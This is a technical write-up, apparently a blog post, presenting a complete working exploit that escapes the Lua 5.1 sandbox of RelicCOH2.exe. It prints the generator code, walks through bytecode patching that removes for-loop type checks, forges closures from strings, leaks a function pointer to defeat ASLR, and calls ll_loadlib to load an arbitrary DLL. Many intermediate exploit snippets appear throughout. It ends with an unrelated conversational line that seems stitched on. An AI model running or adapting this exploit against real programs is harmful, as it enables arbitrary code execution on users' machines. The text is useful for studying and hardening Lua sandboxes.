The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt
, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevent bits of the Lua 5.1 virtual machine.
if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
error("This generator requires a 32-bit version of Lua 5.1")
local function outer()
local magic -- In bytecode, the stack slot corresponding to this local is changed
local function middle()
local function f2ii(x) -- Convert double to uint32_t[2]
if x == 0 then return 0, 0 end
if x < 0 then x = -x end
local e_lo, e_hi, e, m = -1075, 1023
while true do
e = (e_lo + e_hi)
e = (e - (e % 2)) / 2
m = x / 2^e
if m < 0.5 then e_hi = e elseif 1 <= m then e_lo = e else break end
if e+1023 <= 1 then
m = m * 2^(e+1074)
e = 0
m = (m - 0.5) * 2^53
e = e + 1022
local lo = m % 2^32
m = (m - lo) / 2^32
local hi = m + e * 2^20
return lo, hi
local function ii2f(lo, hi) -- Convert uint32_t[2] to double
local m = hi % 2^20
local e = (hi - m) / 2^20
m = m * 2^32 + lo
if e ~= 0 then
m = m + 2^52
e = 1
return m * 2^(e-1075)
local function asnum(x) -- Reinterpret any TValue as a number
for i = x, x, 0 do -- This would throw an exception for non-numbers if it weren't for modified bytecode
return i
local co, upval
local function inner()
local ub1 = {[0] = -- Convert uint8_t to char[1]
"\0", "\1", "\2", "\3", "\4", "\5", "\6", "\7", "\8", "\9", "\10", "\11", "\12", "\13", "\14",
"\15", "\16", "\17", "\18", "\19", "\20", "\21", "\22", "\23", "\24", "\25", "\26", "\27", "\28",
"\29", "\30", "\31", "\32", "\33", "\34", "\35", "\36", "\37", "\38", "\39", "\40", "\41", "\42",
"\43", "\44", "\45", "\46", "\47", "\48", "\49", "\50", "\51", "\52", "\53", "\54", "\55", "\56",
"\57", "\58", "\59", "\60", "\61", "\62", "\63", "\64", "\65", "\66", "\67", "\68", "\69", "\70",
"\71", "\72", "\73", "\74", "\75", "\76", "\77", "\78", "\79", "\80", "\81", "\82", "\83", "\84",
"\85", "\86", "\87", "\88", "\89", "\90", "\91", "\92", "\93", "\94", "\95", "\96", "\97", "\98",
"\99", "\100", "\101", "\102", "\103", "\104", "\105", "\106", "\107", "\108", "\109", "\110", "\111",
"\112", "\113", "\114", "\115", "\116", "\117", "\118", "\119", "\120", "\121", "\122", "\123", "\124",
"\125", "\126", "\127", "\128", "\129", "\130", "\131", "\132", "\133", "\134", "\135", "\136", "\137",
"\138", "\139", "\140", "\141", "\142", "\143", "\144", "\145", "\146", "\147", "\148", "\149", "\150",
"\151", "\152", "\153", "\154", "\155", "\156", "\157", "\158", "\159", "\160", "\161", "\162", "\163",
"\164", "\165", "\166", "\167", "\168", "\169", "\170", "\171", "\172", "\173", "\174", "\175", "\176",
"\177", "\178", "\179", "\180", "\181", "\182", "\183", "\184", "\185", "\186", "\187", "\188", "\189",
"\190", "\191", "\192", "\193", "\194", "\195", "\196", "\197", "\198", "\199", "\200", "\201", "\202",
"\203", "\204", "\205", "\206", "\207", "\208", "\209", "\210", "\211", "\212", "\213", "\214", "\215",
"\216", "\217", "\218", "\219", "\220", "\221", "\222", "\223", "\224", "\225", "\226", "\227", "\228",
"\229", "\230", "\231", "\232", "\233", "\234", "\235", "\236", "\237", "\238", "\239", "\240", "\241",
"\242", "\243", "\244", "\245", "\246", "\247", "\248", "\249", "\250", "\251", "\252", "\253", "\254",
local function ub4(x) -- Convert little endian uint32_t to char[4]
local b0 = x % 256; x = (x - b0) / 256
local b1 = x % 256; x = (x - b1) / 256
local b2 = x % 256; x = (x - b2) / 256
local b3 = x % 256
return ub1[b0] .. ub1[b1] .. ub1[b2] .. ub1[b3]
do local l0 = 2^52 local l1, l2, l3, l4, l5, l6, l7 = l0, l0, l0, l0, l0, l0, l0 end
co = coroutine.wrap(ub4) -- create a CClosure
upval = 2^52 .. ub4(asnum(co) - (2^52 - 12))
local upval_ptr = ub4(asnum(upval) - (2^52 - 16 - 12))
magic = upval_ptr .. upval_ptr -- sets middle's call frame's LClosure::p and LClosure::upvals[0]
local delta = 39984 -- (char*)ll_loadlib - (char*)luaB_auxwrap
local dll = "ignore-unsigned-sga.dll"
-- As inner has manipulated the call frame, globals and literal constants cannot be used for the remainder of the function.
local lo, hi = f2ii(asnum(magic)) -- lo and hi are co's CClosure::env and CClosure::f
magic = ii2f(lo, hi + delta) -- sets co's CClosure::f to ll_loadlib
co(dll, dll)
outer = string.dump(outer)
:gsub("\96%z%z\128", "\22\0\0\128") -- remove the FORPREP in asnum
:gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1) -- in outer, bind magic to the stack slot containing the executing function
local f ="ignore-unsigned-sga.fnt", "wb")
The first structure of interest is the `TValue`, which is used to represent Lua values throughout the virtual machine: ```c struct TValue { union { void *p; double n; } value; int tt; }; ``` The value of `tt` specifies which member of the union is in use. We're interested in the following values for `tt` and associated layouts of `TValue` on 32-bit Windows:
Bits 0-31 | Bits 32-63 | Bits 64-95 (tt ) | Bits 96-127 |
unused | LUA_TNIL | padding | |
void* | unused | LUA_TLIGHTUSERDATA | padding |
double | LUA_TNUMBER | padding | |
TString* | unused | LUA_TSTRING | padding |
Closure* | unused | LUA_TFUNCTION | padding |
The first Lua virtual machine opcodes of interest are `OP_FORPREP` and `OP_FORLOOP`, which are used to implement Lua's numeric for loop. Their implementations are as follows: ```c case OP_FORPREP: const TValue *init = ra; const TValue *plimit = ra+1; const TValue *pstep = ra+2; L->savedpc = pc; /* next steps may throw errors */ if (!tonumber(init , ra )) luaG_runerror(L, "'for' initial value must be a number"); if (!tonumber(plimit, ra+1)) luaG_runerror(L, "'for' limit must be a number"); if (!tonumber(pstep , ra+2)) luaG_runerror(L, "'for' step must be a number"); setnvalue(ra, nvalue(ra) - nvalue(pstep)); dojump(L, pc, GETARG_sBx(i)); ``` ```c case OP_FORLOOP: double step = nvalue(ra+2); double idx = nvalue(ra) + step; /* increment index */ double limit = nvalue(ra+1); if ((0 < step) ? (idx <= limit) : (limit <= idx)) { dojump(L, pc, GETARG_sBx(i)); /* jump back */ setnvalue(ra, idx); /* update internal index... */ setnvalue(ra+3, idx); /* ...and external index */ } ``` In normal operation, `OP_FORPREP` checks that the three parameters to a numeric for loop are in fact numbers, performs the inverse of the addition at the start of `OP_FORLOOP`, and then jumps to a `OP_FORLOOP` instruction. In normal operation, `OP_FORLOOP` executes before the start of the loop and at the end of every loop body, and its role is to increment the loop counter and then conditionally jump back into the loop body. Crucially, because it is assumed that `OP_FORPREP` has checked that every `TValue` contains a number, `OP_FORLOOP` unconditionally interprets the low 64-bits of every `TValue` as a `double`. Although `OP_FORPREP` and `OP_FORLOOP` normally occur in pairs, if we're writing bytecode manually, then we can emit a lone `OP_FORLOOP` instruction, or if we're patching generated bytecode, then we can replace an `OP_FORPREP` instruction with an instruction which just does `dojump(L, pc, GETARG_sBx(i))`.
Patching out an OP_FORPREP
instruction gives us our first interesting function:
asnum = loadstring((string.dump(function(x)
for i = x, x, 0 do
return i
end):gsub("\96%z%z\128", "\22\0\0\128")))
Upon first inspection, asnum
doesn't seem overly useful:
f = function() end
print(tostring(f)) --> function: 003C42D0
print(asnum(f)) --> 1.9511956687576e-317
As a stranger example, consider the following:
do local dummy = 2^52 end
local f = function() end
print(tostring(f)) --> function: 003BC810
print(asnum(f) - 2^52) --> 3917840
The first line creates a TValue
containing a 64-bit double
payload, and then throws away the TValue
as it leaves scope. The second line creates a TValue
containing a 32-bit Closure*
payload, and due to the stack nature of Lua locals, this TValue
re-uses the storage from the previous TValue
, so it inherits bits 32-63 from the double
. In binary, 2^52
is a one followed by fifty-two zeroes, and a double
conveniently has fifty-two bits of mantissa (precision). Therefore, for a thirty-two bit n
, 2^52+n
in binary is a one followed by twenty zeroes followed by the thirty-two bits of n
, and in a double
these bits of n
occupy the low thirty-two bits. The above example uses this process in reverse to convert f
to a thirty-two bit number, which is clear after noticing that 0x003BC810
(hexadecimal) is equal to 3917840
(decimal). As such, asnum
gives us a way to pull the TString*
or Closure*
out of a specially constructed TValue
The next structure of interest is `LClosure`, which represents an instance of a Lua function: ```c struct LClosure { GCObject *next; lu_byte tt; /* == LUA_TFUNCTION */ lu_byte marked; lu_byte isC; /* == 0 */ lu_byte nupvalues; GCObject *gclist; struct Table *env; struct Proto *p; /* this contains the bytecode to execute */ UpVal *upvals[nupvalues]; /* variably sized */ }; ``` Also of interest is `TString`, which represents a Lua string: ```c struct TString { GCObject *next; lu_byte tt; /* == LUA_TSTRING */ lu_byte marked; lu_byte reserved; /* == 0 for most strings */ unsigned int hash; /* == hash_of(s) */ size_t len; char s[len]; /* variably sized */ }; ``` Comparing their memory layouts, we get the following:
Bits 0-31 | Bits 32-63 | Bits 64-95 | Bits 96-127 | Bits 128-191 | ||||
next | tt | marked | isC | nupvalues | gclist | env | p | upvals[0] |
next | tt | marked | reserved | padding | hash | len | s[0:3] | s[4:7] |
The next topic of note is how call frames work in the Lua virtual machine. For this, consider the following example: ```lua function f(x) local y = 22 g(33) end function g(x) h(44) end function h(x) return 55 end f(11) ``` When the `return 55` instruction is executing, the top of the stack contains eight interesting values and four call frames:
... low part of stack ... | f | 11 | 22 | g | 33 | h | 44 | 55 |
ambient frame | ||||||||
f 's frame | ||||||||
g 's frame | ||||||||
h 's frame |
Switching between call frames is interesting, and is done by the following code in the Lua virtual machine:
void luaV_execute (lua_State *L, int nexeccalls) {
LClosure *cl;
TValue *base;
TValue *k;
const Instruction *pc;
reentry: /* entry point */
lua_assert(L->ci->func->tt == LUA_TFUNCTION && !(clvalue(L->ci->func)->l.isC));
pc = L->savedpc;
cl = &clvalue(L->ci->func)->l;
base = L->base;
k = cl->p->k;
/* main loop of interpreter */
for (;;) {
const Instruction i = *pc++;
/* ... debugging stuff ... (not of interest) */
switch (GET_OPCODE(i)) {
/* ... various other opcodes (some of which use cl and k) ... */
case OP_CALL: {
int b = GETARG_B(i);
int nresults = GETARG_C(i) - 1;
if (b != 0) L->top = ra+b; /* else previous instruction set top */
L->savedpc = pc;
switch (luaD_precall(L, ra, nresults)) {
case PCRLUA: {
goto reentry; /* restart luaV_execute over new Lua function */
/* ... other cases ... (not of interest) */
case OP_RETURN: {
int b = GETARG_B(i);
if (b != 0) L->top = ra+b-1;
if (L->openupval) luaF_close(L, base);
L->savedpc = pc;
b = luaD_poscall(L, ra); /* pos is a shortening of post, as in pre-call and post-call */
if (--nexeccalls == 0) /* was previous function running `here'? */
return; /* no: return */
else { /* yes: continue its execution */
if (b) L->top = L->ci->top;
lua_assert(GET_OPCODE(*((L->ci)->savedpc - 1)) == OP_CALL);
goto reentry;
Of particular note is that OP_RETURN
ends with goto reentry
, and reentry:
is followed by a complex assertion which checks that the CallInfo
's func
field points to a TValue
containing an LClosure
. However, lua_assert
is turned off by default, and very few people turn it on. In our case, assertions are indeed turned off, so the complex assertion doesn't actually run, and the TValue
is unconditionally treated as containing an LClosure*
At this point, the astute reader will recognise the familiarity with OP_FORLOOP
, and will recall that we compared the memory layout of LClosure
and TString
. Given this, it should be obvious where we're going.
The next instruction of interest is `OP_CLOSURE`, which creates a `TValue` containing an `LClosure`, and initialises its `UpVal`s. The implementation of this instruction is as follows: ```c case OP_CLOSURE: Proto *p; Closure *ncl; int nup, j; p = cl->p->p[GETARG_Bx(i)]; nup = p->nups; ncl = luaF_newLclosure(L, nup, cl->env); ncl->l.p = p; for (j=0; jl.upvals[j] = cl->upvals[GETARG_B(*pc)]; else { lua_assert(GET_OPCODE(*pc) == OP_MOVE); ncl->l.upvals[j] = luaF_findupval(L, base + GETARG_B(*pc)); } } setclvalue(L, ra, ncl); Protect(luaC_checkGC(L)); ``` In the cases we're interested in, an `OP_CLOSURE` instruction is followed by one dummy `OP_MOVE` instruction for each upvalue, which collectively specify which `TValue`s of the current call frame should be pointed to by the closure's `UpVal` structures. In generated bytecode, the specified `TValue`s can only be parameters or local variables of the current call frame, but when writing bytecode manually, the specified `TValue`s can be any members of the current call frame.
In particular, when writing bytecode manually we can point UpVal
s at the same stack slots that the next call frame's CallInfo::func
field points to. The following example gives a simple case of this, where print(magic)
doesn't print nil
local magic = nil
local function middle()
print(magic) --> function: 0051639
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1"))()
As a more interesting example, we can change the TValue
pointed to by the UpVal
, and then return to the call frame whose CallInfo::func
pointed at the same TValue
local magic = nil
local function middle()
local function inner()
magic = inner
return "print", "World"
print("Hello") --> World
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))()
The above example is somewhat intricate: because of magic = inner
, after the call to inner
, luaV_execute
's cl
variable is set back to inner
rather than middle
, so print("Hello")
actually prints World
The first interesting application of the above technique is to create arbitrary `TValue`s. For this, we need to recall `asnum` from earlier, and we also need a helper function for converting numbers to strings: ```lua asnum = loadstring((string.dump(function(x) for i = x, x, 0 do return i end end):gsub("\96%z%z\128", "\22\0\0\128")))
ub4 = function(x) -- Convert little endian uint32_t to char[4] local b0 = x % 256; x = (x - b0) / 256 local b1 = x % 256; x = (x - b1) / 256 local b2 = x % 256; x = (x - b2) / 256 local b3 = x % 256 return string.char(b0, b1, b2, b3) end
The astute reader will note that `ub4` can be rewritten to work even when `string.char` is not present (the actual exploit code for RelicCOH2.exe implements `ub4` by using a lookup table to convert the individual bytes to strings of length 1, and then concatenating the strings).
With these functions in place, consider the following:
local magic = nil
local function middle()
local print = print
local lud, upval
local function inner()
lud = 2^52 .. ub4(0xDEADBEEF) .."high".. ub4(2) .."padd"
upval = 2^52 .."next".."t".."m".."pa".. ub4(asnum(lud) - 2^52 + 16 + 20)
local upval_ptr = ub4(asnum(upval) - 2^52 + 16 + 20)
magic = upval_ptr .. upval_ptr
print(magic) --> userdata: DEADBEEF
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))()
The first interesting assignment in the above is to the lud
variable. Ignoring the 2^52 ..
for a moment, the remainder is a 128 bit string which can be interpreted as a TValue
: four bytes containing a pointer to 0xDEADBEEF
, four unused bytes, four bytes for a tt
, and four bytes of padding. The next interesting assignment is to the upval
variable. Again ignoring the 2^52 ..
, the remainder can be interpreted as an UpVal
: four bytes for next
, one byte each for tt
and marked
, two bytes of padding, and then four bytes of TValue*
. The final interesting assignment to to the magic
variable, which is a TString
with an 8-byte payload, and will later be reinterpreted as an LClosure
. As we've previously seen by comparing the memory layouts, the first four bytes become a Proto*
, and the next four bytes become an UpVal*
At this point, the remaining tricks of the inner
function are the numeric constants 2^52
, 16
, and 20
. The result of a string concatenation is a TValue
containing a TString*
, but this TValue
has the interesting property that the 32 unused bits following the TString*
are copied from the leftmost operand of the concatenation. As such, when the leftmost operand in a concatenation is 2^52
, the resulting TValue
can go through asnum
and then have 2^52
subtracted to yield the TString*
. The next value, 16
is the size of all of the fields in a TString
prior to the actual string data. The final value, 20
, is the length of the string 4.5035996273705e+015
, with this being the string representation of 2^52
Before the final reveal, two functions of interest are needed: ```lua f2ii = function(x) -- Convert double to uint32_t[2] if x == 0 then return 0, 0 end if x < 0 then x = -x end
local e_lo, e_hi, e, m = -1075, 1023 while true do -- this loop is math.frexp e = (e_lo + e_hi) e = (e - (e % 2)) / 2 m = x / 2^e if m < 0.5 then e_hi = e elseif 1 <= m then e_lo = e else break end end
if e+1023 <= 1 then m = m * 2^(e+1074) e = 0 else m = (m - 0.5) * 2^53 e = e + 1022 end
local lo = m % 2^32 m = (m - lo) / 2^32 local hi = m + e * 2^20 return lo, hi end
ii2f = function(lo, hi) -- Convert uint32_t[2] to double local m = hi % 2^20 local e = (hi - m) / 2^20 m = m * 2^32 + lo
if e ~= 0 then m = m + 2^52 else e = 1 end return m * 2^(e-1075) end
The role of `f2ii` is to take a number (say the result of `asnum`), and return two integers in range `[0, 2^32)`, which are obtained by reinterpreting the 8 bytes of the original `double` as two `uint32_t`s. This particular implementation of `f2ii` ignores the sign bit of the original `double`, so the second return value is always in the range `[0,2^31)`, but this doesn't matter for our purposes. This particular implementation of `f2ii` also fails for inputs which are `NaN` or positive or negative infinity, but again this is acceptable for our purposes. The `ii2f` function performs the inverse of `f2ii`.
The interested reader should consult the [IEEE754-1985]( specification of floating point numbers to gain an appreciation of why these functions work. Alternatively, `ii2f` and `f2ii` can be compared to `reader` and `writer` in the [implementation of vstruct](
The final structure of interest is `CClosure`, which is similar to an `LClosure`, but represents an instance of a C function rather than a Lua function:
struct CClosure {
GCObject *next;
lu_byte tt; /* == LUA_TFUNCTION */
lu_byte marked;
lu_byte isC; /* == 1 */
lu_byte nupvalues;
GCObject *gclist;
struct Table *env;
int (*f)(lua_State*);
TValue upvalue[nupvalues]; /* variably sized */
The interesting observation is that this structure contains a function pointer, and said function pointer is called when Lua code calls the function represented by the CClosure
. If we want to execute arbitrary code, then we could adapt the previous example to construct a CClosure
, and then call it rather than print it. Unfortunately, reality is cold and harsh: DEP means that we we can only execute code in memory pages which are marked as executable, and ASLR means that we don't know where those pages are. The normal method for defeating DEP is to call code which is already present in the executable, and in the case of RelicCOH2.exe, the executable contains a function called ll_loadlib
, which is the C function that gets called when Lua code calls package.loadlib
(the purpose of this function being to load arbitrary DLLs). That solves the DEP problem, but it leaves the ASLR problem: we have no idea where ll_loadlib
is in memory.
One approach for defeating ASLR is to inspect the function pointer in an existing CClosure
object. In our case, while the Lua sandbox we're playing in doesn't have package.loadlib
, it does have coroutine.wrap
, and coroutine.wrap
creates a CClosure
whose function pointer is set to luaB_auxwrap
. Following on from the previous example, consider the following:
local magic = nil
local function middle()
local print, asnum, f2ii = print, asnum, f2ii
local co, upval
local function inner()
do local l0 = 2^52 local l1, l2, l3, l4, l5, l6, l7 = l0, l0, l0, l0, l0, l0, l0 end
co = coroutine.wrap(function() end)
upval = 2^52 .."next".."t".."m".."pa".. ub4(asnum(co) - 2^52 + 12)
local upval_ptr = ub4(asnum(upval) - 2^52 + 16 + 20)
magic = upval_ptr .. upval_ptr
print(f2ii(asnum(magic))) --> 7906440, 1396459600
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))()
In this example, we call coroutine.wrap
in order to create a CClosure
, and then print out the env
and f
fields of the CClosure
. The line prior to the assignment to co
sprays the stack with the value 2^52
to ensure that we can do the usual asnum(co) - 2^52
trick. For pulling out the f
field, we cannot use the 2^52
trick, as the f
field is followed by 4 bytes of padding whose value is indeterminate. Instead, we create an UpVal
whose TValue*
is the address of the env
field, and use f2ii
to read two 32-bit values. Note that we could set the TValue*
to the address of f
, but this would increase the liklihood of f2ii
receiving a NaN or an infinity as input, which it cannot handle.
By disassembly, we can learn that in RelicCOH2.exe, luaB_auxwrap
and ll_loadlib
are 39984 bytes apart. This leads to the following code for defeating ASLR:
local magic = nil
local function middle()
local print, asnum, f2ii = print, asnum, f2ii
local co, upval
local function inner()
do local l0 = 2^52 local l1, l2, l3, l4, l5, l6, l7 = l0, l0, l0, l0, l0, l0, l0 end
co = coroutine.wrap(function() end)
upval = 2^52 .."next".."t".."m".."pa".. ub4(asnum(co) - 2^52 + 12)
local upval_ptr = ub4(asnum(upval) - 2^52 + 16 + 20)
magic = upval_ptr .. upval_ptr
local dll_name = "my_dll.dll"
local function_name = "entry_point"
local delta = 39984 -- this offset is only valid for RelicCOH2.exe; it will lead to a crash in most other programs
local env, f = f2ii(asnum(magic))
f = f + delta
magic = ii2f(env, f)
co(dll_name, function_name) -- calls ll_loadlib
end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))()
Thanks for the detailed review. What do you think is the best way to change Lua in order to avoid this vulnerability?